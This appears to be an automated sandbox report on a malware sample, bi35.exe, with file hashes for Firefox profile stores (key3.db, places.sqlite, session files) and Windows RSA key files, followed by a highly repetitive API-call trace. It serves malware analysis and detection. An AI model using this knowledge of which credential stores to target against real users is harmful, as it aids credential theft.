c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json 0.86 KB (880 bytes) MD5: ff04887dc37b6731a048ece8ff32fb8f
SHA1: 98d538e377c2f5c20ad739a72bc5f18c7b261d68
SHA256: 6f92acd43145cc497ca677d6cd183e5d99b06abf534dbad3ba12c797c96b4d68 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\key3.db 16.52 KB (16912 bytes) MD5: 19198bf743d858949597941a7667772d
SHA1: 6c753754225579ccf0964dad36af8dd673a729bc
SHA256: 1d72a7021ec432f1fb582d0c23b0a650c95dbc89b37623af7d333a2f39c26e11 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\kinto.sqlite 1.00 MB (1049104 bytes) MD5: 6cef10510eb4d85cc1a32afa2c95b78c
SHA1: e9a2e3141c16a4e114f078e88add801d9161f76d
SHA256: 6da159242cbbe8e6802e87c144afaee3b935142d8e9d3ad3ec15b16ff8c3a92f 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\permissions.sqlite 96.52 KB (98832 bytes) MD5: 5dd5df4019efab4438f5c144f24728b9
SHA1: 61cedf727326bc6baf97f26a7ff7fc0dbd1b5186
SHA256: 4c3b4f13857f461d004c53d1f42019c9571e5321e86954d066885a88f7494cca 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\places.sqlite 10.00 MB (10485760 bytes) MD5: 3ab16d235b46fffed29dda7fe31787a0
SHA1: 1ba8034558d85940390c10caa7b2ab09dcada2f5
SHA256: 8b95953b69d7ff6000349477f52fd40a2cb515d08e8620adac189ebc7b58cb3e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\pluginreg.dat 1.08 KB (1104 bytes) MD5: 162a464f975f993c02ff5de49fe6a2b4
SHA1: ecae0a478653ef771a197e00452ac03a2c9ebf12
SHA256: f2881afc2955788c621332c75bb71ad9fc506ef5787b23a15043e1e7842d97e0 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\prefs.js 11.72 KB (12000 bytes) MD5: 839d9a66603b13b7100d7fd075ecde59
SHA1: 81a0774f64a853bda4f96cb42d9d1d5192faa475
SHA256: b29027e15fe4483662d5ac2afcfd6dc1d15b16290b74efed77144ef0e7b699b2 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\revocations.txt 21.44 KB (21952 bytes) MD5: 45b97e176b42c7ae086b7b03029accd1
SHA1: 79856813a976809b7a141665745bc723fbf3af07
SHA256: 19167bd47a5e3b0b3e7164a05ff42024a1eedaa6db483303c62b918941a85bf8 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\secmod.db 16.52 KB (16912 bytes) MD5: 2001bfd869409aea96b4cf4e1f65ee67
SHA1: 0ef3e6633d416d4d6b2ed46c12c7e59313936fc5
SHA256: b44ab5c2c2912d3a68c285fb0b4ba224ba2e9ce6d471872d0f6a17c10a584220 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessioncheckpoints.json 0.80 KB (816 bytes) MD5: 3c427b245983dca52645773e536fc82b
SHA1: f1fc2a755f082783eab12953878c7af32bc8bead
SHA256: 78b76d62144692eeba9190289494dbc3f421089d423f36b91cd32dc1caf2ea4d 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessionstore-backups\previous.js 167.84 KB (171872 bytes) MD5: a65d3e11898c7c575d3dccdd364a7486
SHA1: cb31ffbb450e8129fbe6ebda11e5e793a66ed43c
SHA256: 3ded70e20fab2e198fe845d80a133036f3bb13bccc85c8ba555520dcd31cc4f6 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessionstore.js 1.48 KB (1520 bytes) MD5: 5e613b2b8b410f7e91a31cde38585305
SHA1: b880d6ec174e9bc8699aa22cf067311e89a2f0f8
SHA256: 53d04e36c7fc49fe215fe947f98bfaf398b2f101046b53f2fe43575f3ff5a4df 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sitesecurityservicestate.txt 2.41 KB (2464 bytes) MD5: 041f6ac7e85658c83cb4d1d92a8b22aa
SHA1: 3c120c5f836e81287a81d560e4ccb64e95d6b00b
SHA256: 9fca5af3190c6763539910f1a10020c260a45795c3da6f92225bddf177efaa98 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite 48.52 KB (49680 bytes) MD5: 68f90dc52361ba8b54c5692208616a49
SHA1: 22efbf16fe06abb5007b6b7d9d792af433373336
SHA256: a2549c70334b67550eea1a49316375293f1d4f536071bd072783c2b24715545a 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite 48.52 KB (49680 bytes) MD5: 9fd26e3c40ca850bf1d4437feeb3bd3d
SHA1: 2a983860a398b83a0bceda217b22d27d4c4fa600
SHA256: c54caf1b4643adc5658dadcc45d57de9a9c43e05e3ba5843c91142aa541ecf77 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b 2.15 KB (2205 bytes) MD5: af6f889ecbdfd677431a5616c96721ff
SHA1: 71b4300eef8051ae71947bee7acf228e805a9e4f
SHA256: 9ee4a265dda07081ee7610d3961f4b358a27e71773130b7ff302b74aad22382f 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\inetcache\ie\gy9r3u9a\curl[1].htm 5.58 KB (5709 bytes) MD5: c5affe17659f4678b3b1db8895f8a15f
SHA1: 6aa4f6180ed1c9c3842dc1f98f04c493b6aa06e4
SHA256: 8a9bec677501bce2a23cd916993eb4cda61de5558ca7a8d7c1b6c7bf7fac2d3a 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\themes\cachedfiles\cachedimage_1440_900_pos4.jpg 73.88 KB (75648 bytes) MD5: 340d913d43779ca4eca5063e73d6385e
SHA1: bf9eb984a0f2e916aa8a30e0489deab28c5209d8
SHA256: 0563766b6648a1bf9149b1144b2f65408dfdea38926379fdd4dd33d853ca3162 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage.sqlite 1.27 KB (1296 bytes) MD5: 6f2a52c09fa7f6d3c69675aac90d37a0
SHA1: cf6322306317c5a27e5c0f7a0da3f3f9232b34a3
SHA256: 1d510585ce43f029a70421c6bded60edf95f921b514cd618216e76c74a79134a 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\inetcache\ie\gy9r3u9a\curl[1].htm 0.01 KB (9 bytes) MD5: c10a7c96545d0a2036182e6dd9b1f77d
SHA1: a236d8b07f31db873248ea3479d4492cb94be4a1
SHA256: 5295a5a829000e27c6ae487074604047efdd7e09707f2020e3c7e51a862ab805 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b 2.15 KB (2205 bytes) MD5: 15827431a1e69c0a146ab23b0a34c7a1
SHA1: bde20cb138730f7f32e35bb3f22d5bd6e13ced64
SHA256: 4152d45ee338fcd3a5d9d8f814736b83dc793d9ed65ef5708807d764d2a5585c 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\inetcache\counters.dat 0.12 KB (128 bytes) MD5: facb92e802657acec0e601099feda01f
SHA1: a9c28f5f7652f67547a6aed28cf5b749d6a10523
SHA256: e5bf4e0df2157904a32ea3c903931640cabadbe0cd21b5c4ecced2087d4b1d3f 		False
Threads
Thread 0xad4
(Host: 691, Network: 22)
+
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-01-26 17:52:09 (UTC) True 1
Fn
System Get Time type = Ticks, time = 106218 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76bda330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76bd7580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76bd9910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76bdf400 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\desktop\bi35.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, size = 260 True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
